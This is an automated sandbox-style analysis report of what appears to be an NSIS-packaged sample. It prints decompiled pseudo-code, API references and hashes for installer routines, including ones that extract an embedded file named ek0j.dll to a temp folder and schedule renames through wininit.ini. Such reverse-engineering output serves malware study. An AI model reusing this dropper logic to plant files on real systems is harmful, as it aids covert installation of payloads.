                                                                    • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                                                  • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                                                  • API String ID: 3633819597-1342836890
                                                                  • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                  • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
                                                                  • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                  • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 90%
                                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                  				struct tagLOGBRUSH _v16;
                                                                  				struct tagRECT _v32;
                                                                  				struct tagPAINTSTRUCT _v96;
                                                                  				struct HDC__* _t70;
                                                                  				struct HBRUSH__* _t87;
                                                                  				struct HFONT__* _t94;
                                                                  				long _t102;
                                                                  				signed int _t126;
                                                                  				struct HDC__* _t128;
                                                                  				intOrPtr _t130;
                                                                  
                                                                  				if(_a8 == 0xf) {
                                                                  					_t130 =  *0x7a2f88;
                                                                  					_t70 = BeginPaint(_a4,  &_v96);
                                                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                  					_a8 = _t70;
                                                                  					GetClientRect(_a4,  &_v32);
                                                                  					_t126 = _v32.bottom;
                                                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                                                  					while(_v32.top < _t126) {
                                                                  						_a12 = _t126 - _v32.top;
                                                                  						asm("cdq");
                                                                  						asm("cdq");
                                                                  						asm("cdq");
                                                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                  						_t87 = CreateBrushIndirect( &_v16);
                                                                  						_v32.bottom = _v32.bottom + 4;
                                                                  						_a16 = _t87;
                                                                  						FillRect(_a8,  &_v32, _t87);
                                                                  						DeleteObject(_a16);
                                                                  						_v32.top = _v32.top + 4;
                                                                  					}
                                                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                  						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                  						_a16 = _t94;
                                                                  						if(_t94 != 0) {
                                                                  							_t128 = _a8;
                                                                  							_v32.left = 0x10;
                                                                  							_v32.top = 8;
                                                                  							SetBkMode(_t128, 1);
                                                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                  							_a8 = SelectObject(_t128, _a16);
                                                                  							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
                                                                  							SelectObject(_t128, _a8);
                                                                  							DeleteObject(_a16);
                                                                  						}
                                                                  					}
                                                                  					EndPaint(_a4,  &_v96);
                                                                  					return 0;
                                                                  				}
                                                                  				_t102 = _a16;
                                                                  				if(_a8 == 0x46) {
                                                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
                                                                  				}
                                                                  				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                  			}













                                                                  0x0040100a
                                                                  0x00401039
                                                                  0x00401047
                                                                  0x0040104d
                                                                  0x00401051
                                                                  0x0040105b
                                                                  0x00401061
                                                                  0x00401064
                                                                  0x004010f3
                                                                  0x00401089
                                                                  0x0040108c
                                                                  0x004010a6
                                                                  0x004010bd
                                                                  0x004010cc
                                                                  0x004010cf
                                                                  0x004010d5
                                                                  0x004010d9
                                                                  0x004010e4
                                                                  0x004010ed
                                                                  0x004010ef
                                                                  0x004010ef
                                                                  0x00401100
                                                                  0x00401105
                                                                  0x0040110d
                                                                  0x00401110
                                                                  0x00401112
                                                                  0x00401118
                                                                  0x0040111f
                                                                  0x00401126
                                                                  0x00401130
                                                                  0x00401142
                                                                  0x00401156
                                                                  0x00401160
                                                                  0x00401165
                                                                  0x00401165
                                                                  0x00401110
                                                                  0x0040116e
                                                                  0x00000000
                                                                  0x00401178
                                                                  0x00401010
                                                                  0x00401013
                                                                  0x00401015
                                                                  0x0040101f
                                                                  0x0040101f
                                                                  0x00000000

                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32 ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32 ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                  • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
                                                                  • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                  • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 88%
                                                                  			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
                                                                  				struct _ITEMIDLIST* _v8;
                                                                  				char _v12;
                                                                  				signed int _v16;
                                                                  				signed int _v20;
                                                                  				signed int _v24;
                                                                  				signed int _v28;
                                                                  				CHAR* _t35;
                                                                  				signed int _t37;
                                                                  				signed int _t38;
                                                                  				signed int _t49;
                                                                  				char _t51;
                                                                  				signed int _t61;
                                                                  				char* _t62;
                                                                  				char _t67;
                                                                  				signed int _t69;
                                                                  				CHAR* _t79;
                                                                  				signed int _t86;
                                                                  				signed int _t88;
                                                                  				void* _t89;
                                                                  
                                                                  				_t61 = _a8;
                                                                  				if(_t61 < 0) {
                                                                  					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
                                                                  				}
                                                                  				_t62 = _t61 +  *0x7a2fb8;
                                                                  				_t35 = 0x7a1f20;
                                                                  				_t79 = 0x7a1f20;
                                                                  				if(_a4 - 0x7a1f20 < 0x800) {
                                                                  					_t79 = _a4;
                                                                  					_a4 = _a4 & 0x00000000;
                                                                  				}
                                                                  				while(1) {
                                                                  					_t67 =  *_t62;
                                                                  					_a11 = _t67;
                                                                  					if(_t67 == 0) {
                                                                  						break;
                                                                  					}
                                                                  					__eflags = _t79 - _t35 - 0x400;
                                                                  					if(_t79 - _t35 >= 0x400) {
                                                                  						break;
                                                                  					}
                                                                  					_t62 = _t62 + 1;
                                                                  					__eflags = _t67 - 0xfc;
                                                                  					if(__eflags <= 0) {
                                                                  						if(__eflags != 0) {
                                                                  							 *_t79 = _t67;
                                                                  							_t79 =  &(_t79[1]);
                                                                  							__eflags = _t79;
                                                                  						} else {
                                                                  							 *_t79 =  *_t62;
                                                                  							_t79 =  &(_t79[1]);
                                                                  							_t62 = _t62 + 1;
                                                                  						}
                                                                  						continue;
                                                                  					}
                                                                  					_t37 =  *((char*)(_t62 + 1));
                                                                  					_t69 =  *_t62;
                                                                  					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
                                                                  					_v28 = _t69;
                                                                  					_v20 = _t37;
                                                                  					_t70 = _t69 | 0x00008000;
                                                                  					_t38 = _t37 | 0x00008000;
                                                                  					_v24 = _t69 | 0x00008000;
                                                                  					_t62 = _t62 + 2;
                                                                  					__eflags = _a11 - 0xfe;
                                                                  					_v16 = _t38;
                                                                  					if(_a11 != 0xfe) {
                                                                  						__eflags = _a11 - 0xfd;
                                                                  						if(_a11 != 0xfd) {
                                                                  							__eflags = _a11 - 0xff;
                                                                  							if(_a11 == 0xff) {
                                                                  								__eflags = (_t38 | 0xffffffff) - _t86;
                                                                  								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
                                                                  							}
                                                                  							L38:
                                                                  							_t79 =  &(_t79[lstrlenA(_t79)]);
                                                                  							_t35 = 0x7a1f20;
                                                                  							continue;
                                                                  						}
                                                                  						__eflags = _t86 - 0x1b;
                                                                  						if(_t86 != 0x1b) {
                                                                  							__eflags = (_t86 << 0xa) + 0x7a4000;
                                                                  							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
                                                                  						} else {
                                                                  							E0040591D(_t79,  *0x7a2f84);
                                                                  						}
                                                                  						__eflags = _t86 + 0xffffffeb - 6;
                                                                  						if(_t86 + 0xffffffeb < 6) {
                                                                  							L29:
                                                                  							E00405BFB(_t79);
                                                                  						}
                                                                  						goto L38;
                                                                  					}
                                                                  					_a8 = _a8 & 0x00000000;
                                                                  					 *_t79 =  *_t79 & 0x00000000;
                                                                  					_t88 = 4;
                                                                  					__eflags = _v20 - _t88;
                                                                  					if(_v20 != _t88) {
                                                                  						_t49 = _v28;
                                                                  						__eflags = _t49 - 0x2b;
                                                                  						if(_t49 != 0x2b) {
                                                                  							__eflags = _t49 - 0x26;
                                                                  							if(_t49 != 0x26) {
                                                                  								__eflags = _t49 - 0x25;
                                                                  								if(_t49 != 0x25) {
                                                                  									__eflags = _t49 - 0x24;
                                                                  									if(_t49 != 0x24) {
                                                                  										goto L19;
                                                                  									}
                                                                  									GetWindowsDirectoryA(_t79, 0x400);
                                                                  									goto L18;
                                                                  								}
                                                                  								GetSystemDirectoryA(_t79, 0x400);
                                                                  								goto L18;
                                                                  							}
                                                                  							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
                                                                  							__eflags =  *_t79;
                                                                  							if( *_t79 != 0) {
                                                                  								goto L29;
                                                                  							}
                                                                  							E004059BF(_t79, "C:\\Program Files");
                                                                  							goto L18;
                                                                  						} else {
                                                                  							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
                                                                  							L18:
                                                                  							__eflags =  *_t79;
                                                                  							if( *_t79 != 0) {
                                                                  								goto L29;
                                                                  							}
                                                                  							goto L19;
                                                                  						}
                                                                  					} else {
                                                                  						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
                                                                  						L19:
                                                                  						__eflags =  *0x7a3004;
                                                                  						if( *0x7a3004 == 0) {
                                                                  							_t88 = 2;
                                                                  						}
                                                                  						do {
                                                                  							_t88 = _t88 - 1;
                                                                  							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
                                                                  							__eflags = _t51;
                                                                  							if(_t51 != 0) {
                                                                  								 *_t79 =  *_t79 & 0x00000000;
                                                                  								__eflags =  *_t79;
                                                                  								goto L25;
                                                                  							}
                                                                  							__imp__SHGetPathFromIDListA(_v8, _t79);
                                                                  							_v12 = _t51;
                                                                  							E0040521C(_t70, _v8);
                                                                  							__eflags = _v12;
                                                                  							if(_v12 != 0) {
                                                                  								break;
                                                                  							}
                                                                  							L25:
                                                                  							__eflags = _t88;
                                                                  						} while (_t88 != 0);
                                                                  						__eflags =  *_t79;
                                                                  						if( *_t79 != 0) {
                                                                  							__eflags = _a8;
                                                                  							if(_a8 != 0) {
                                                                  								lstrcatA(_t79, _a8);
                                                                  							}
                                                                  						}
                                                                  						goto L29;
                                                                  					}
                                                                  				}
                                                                  				 *_t79 =  *_t79 & 0x00000000;
                                                                  				if(_a4 == 0) {
                                                                  					return _t35;
                                                                  				}
                                                                  				return E004059BF(_a4, _t35);
                                                                  			}






















                                                                  0x004059e8
                                                                  0x004059ef
                                                                  0x00405a00
                                                                  0x00405a00
                                                                  0x00405a0a
                                                                  0x00405a0c
                                                                  0x00405a13
                                                                  0x00405a1b
                                                                  0x00405a21
                                                                  0x00405a24
                                                                  0x00405a24
                                                                  0x00405bd5
                                                                  0x00405bd5
                                                                  0x00405bd9
                                                                  0x00405bdc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405a31
                                                                  0x00405a37
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405a3d
                                                                  0x00405a3e
                                                                  0x00405a41
                                                                  0x00405bc8
                                                                  0x00405bd2
                                                                  0x00405bd4
                                                                  0x00405bd4
                                                                  0x00405bca
                                                                  0x00405bcc
                                                                  0x00405bce
                                                                  0x00405bcf
                                                                  0x00405bcf
                                                                  0x00000000
                                                                  0x00405bc8
                                                                  0x00405a47
                                                                  0x00405a4b
                                                                  0x00405a5b
                                                                  0x00405a62
                                                                  0x00405a65
                                                                  0x00405a68
                                                                  0x00405a6a
                                                                  0x00405a6d
                                                                  0x00405a70
                                                                  0x00405a71
                                                                  0x00405a75
                                                                  0x00405a78
                                                                  0x00405b73
                                                                  0x00405b77
                                                                  0x00405ba7
                                                                  0x00405bab
                                                                  0x00405bb0
                                                                  0x00405bb4
                                                                  0x00405bb4
                                                                  0x00405bb9
                                                                  0x00405bbf
                                                                  0x00405bc1
                                                                  0x00000000
                                                                  0x00405bc1
                                                                  0x00405b79
                                                                  0x00405b7c
                                                                  0x00405b91
                                                                  0x00405b98
                                                                  0x00405b7e
                                                                  0x00405b85
                                                                  0x00405b85
                                                                  0x00405ba0
                                                                  0x00405ba3
                                                                  0x00405b6b
                                                                  0x00405b6c
                                                                  0x00405b6c
                                                                  0x00000000
                                                                  0x00405ba3
                                                                  0x00405a7e
                                                                  0x00405a82
                                                                  0x00405a87
                                                                  0x00405a88
                                                                  0x00405a8b
                                                                  0x00405a96
                                                                  0x00405a99
                                                                  0x00405a9c
                                                                  0x00405ab5
                                                                  0x00405ab8
                                                                  0x00405ae5
                                                                  0x00405ae8
                                                                  0x00405af8
                                                                  0x00405afb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405b03
                                                                  0x00000000
                                                                  0x00405b03
                                                                  0x00405af0
                                                                  0x00000000
                                                                  0x00405af0
                                                                  0x00405aca
                                                                  0x00405acf
                                                                  0x00405ad2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405ade
                                                                  0x00000000
                                                                  0x00405a9e
                                                                  0x00405aae
                                                                  0x00405b09
                                                                  0x00405b09
                                                                  0x00405b0c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405b0c
                                                                  0x00405a8d
                                                                  0x00405a8d
                                                                  0x00405b0e
                                                                  0x00405b0e
                                                                  0x00405b15
                                                                  0x00405b19
                                                                  0x00405b19
                                                                  0x00405b1a
                                                                  0x00405b1d
                                                                  0x00405b29
                                                                  0x00405b2f
                                                                  0x00405b31
                                                                  0x00405b50
                                                                  0x00405b50
                                                                  0x00000000
                                                                  0x00405b50
                                                                  0x00405b37
                                                                  0x00405b40
                                                                  0x00405b43
                                                                  0x00405b48
                                                                  0x00405b4c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405b53
                                                                  0x00405b53
                                                                  0x00405b53
                                                                  0x00405b57
                                                                  0x00405b5a
                                                                  0x00405b5c
                                                                  0x00405b60
                                                                  0x00405b66
                                                                  0x00405b66
                                                                  0x00405b60
                                                                  0x00000000
                                                                  0x00405b5a
                                                                  0x00405a8b
                                                                  0x00405be2
                                                                  0x00405bec
                                                                  0x00405bf8
                                                                  0x00405bf8
                                                                  0x00000000

                                                                  APIs
                                                                  • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
                                                                  • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
                                                                  • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
                                                                  • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078EF38,00789938), ref: 00405BBA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                                                  • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                  • API String ID: 4227507514-3711765563
                                                                  • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                  • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
                                                                  • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                  • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 32%
                                                                  			E004026FA() {
                                                                  				void* _t23;
                                                                  				void* _t28;
                                                                  				long _t33;
                                                                  				struct _OVERLAPPED* _t48;
                                                                  				void* _t51;
                                                                  				void* _t53;
                                                                  				void* _t54;
                                                                  				CHAR* _t55;
                                                                  				void* _t58;
                                                                  				void* _t59;
                                                                  				void* _t60;
                                                                  
                                                                  				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
                                                                  				_t54 = E00402A9A(_t48);
                                                                  				_t23 = E00405538(_t54);
                                                                  				_push(_t54);
                                                                  				if(_t23 == 0) {
                                                                  					lstrcatA(E004054CC(E004059BF("C:\Users\engineer\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll", "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
                                                                  					_t55 = 0x40a018;
                                                                  				} else {
                                                                  					_push(0x40a018);
                                                                  					E004059BF();
                                                                  				}
                                                                  				E00405BFB(_t55);
                                                                  				_t28 = E00405690(_t55, 0x40000000, 2);
                                                                  				 *(_t60 + 8) = _t28;
                                                                  				if(_t28 != 0xffffffff) {
                                                                  					_t33 =  *0x7a2f8c;
                                                                  					 *(_t60 - 0x2c) = _t33;
                                                                  					_t53 = GlobalAlloc(0x40, _t33);
                                                                  					if(_t53 != _t48) {
                                                                  						E004030FF(_t48);
                                                                  						E004030CD(_t53,  *(_t60 - 0x2c));
                                                                  						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
                                                                  						 *(_t60 - 0x30) = _t58;
                                                                  						if(_t58 != _t48) {
                                                                  							_push( *(_t60 - 0x1c));
                                                                  							_push(_t58);
                                                                  							_push(_t48);
                                                                  							_push( *((intOrPtr*)(_t60 - 0x20)));
                                                                  							E00402EBD();
                                                                  							while( *_t58 != _t48) {
                                                                  								_t59 = _t58 + 8;
                                                                  								 *(_t60 - 0x38) =  *_t58;
                                                                  								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
                                                                  								_t58 = _t59 +  *(_t60 - 0x38);
                                                                  							}
                                                                  							GlobalFree( *(_t60 - 0x30));
                                                                  						}
                                                                  						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
                                                                  						GlobalFree(_t53);
                                                                  						_push(_t48);
                                                                  						_push(_t48);
                                                                  						_push( *(_t60 + 8));
                                                                  						_push(0xffffffff);
                                                                  						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
                                                                  					}
                                                                  					CloseHandle( *(_t60 + 8));
                                                                  					_t55 = 0x40a018;
                                                                  				}
                                                                  				_t51 = 0xfffffff3;
                                                                  				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
                                                                  					_t51 = 0xffffffef;
                                                                  					DeleteFileA(_t55);
                                                                  					 *((intOrPtr*)(_t60 - 4)) = 1;
                                                                  				}
                                                                  				_push(_t51);
                                                                  				E00401428();
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
                                                                  				return 0;
                                                                  			}














                                                                  0x004026fb
                                                                  0x00402707
                                                                  0x0040270a
                                                                  0x00402711
                                                                  0x00402712
                                                                  0x00402737
                                                                  0x0040273c
                                                                  0x00402714
                                                                  0x00402719
                                                                  0x0040271a
                                                                  0x0040271a
                                                                  0x00402742
                                                                  0x0040274f
                                                                  0x00402757
                                                                  0x0040275a
                                                                  0x00402760
                                                                  0x0040276e
                                                                  0x00402773
                                                                  0x00402777
                                                                  0x0040277a
                                                                  0x00402783
                                                                  0x0040278f
                                                                  0x00402793
                                                                  0x00402796
                                                                  0x00402798
                                                                  0x0040279b
                                                                  0x0040279c
                                                                  0x0040279d
                                                                  0x004027a0
                                                                  0x004027bf
                                                                  0x004027ac
                                                                  0x004027b4
                                                                  0x004027b7
                                                                  0x004027bc
                                                                  0x004027bc
                                                                  0x004027c6
                                                                  0x004027c6
                                                                  0x004027d8
                                                                  0x004027df
                                                                  0x004027e5
                                                                  0x004027e6
                                                                  0x004027e7
                                                                  0x004027ea
                                                                  0x004027f1
                                                                  0x004027f1
                                                                  0x004027f7
                                                                  0x004027fd
                                                                  0x004027fd
                                                                  0x00402807
                                                                  0x00402808
                                                                  0x0040280c
                                                                  0x0040280e
                                                                  0x00402814
                                                                  0x00402814
                                                                  0x0040281b
                                                                  0x004021e8
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                  • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                                                  • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                                                  • GlobalFree.KERNEL32 ref: 004027C6
                                                                  • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                                                  • GlobalFree.KERNEL32 ref: 004027DF
                                                                  • CloseHandle.KERNEL32(?), ref: 004027F7
                                                                  • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                                                    • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll
                                                                  • API String ID: 3508600917-3849229256
                                                                  • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                  • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
                                                                  • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                  • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 94%
                                                                  			E00404D62(CHAR* _a4, CHAR* _a8) {
                                                                  				struct HWND__* _v8;
                                                                  				signed int _v12;
                                                                  				CHAR* _v32;
                                                                  				long _v44;
                                                                  				int _v48;
                                                                  				void* _v52;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				CHAR* _t26;
                                                                  				signed int _t27;
                                                                  				CHAR* _t28;
                                                                  				long _t29;
                                                                  				signed int _t39;
                                                                  
                                                                  				_t26 =  *0x7a2764;
                                                                  				_v8 = _t26;
                                                                  				if(_t26 != 0) {
                                                                  					_t27 =  *0x4092a0; // 0x6
                                                                  					_v12 = _t27;
                                                                  					_t39 = _t27 & 0x00000001;
                                                                  					if(_t39 == 0) {
                                                                  						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
                                                                  					}
                                                                  					_t26 = lstrlenA(0x79ed60);
                                                                  					_a4 = _t26;
                                                                  					if(_a8 == 0) {
                                                                  						L6:
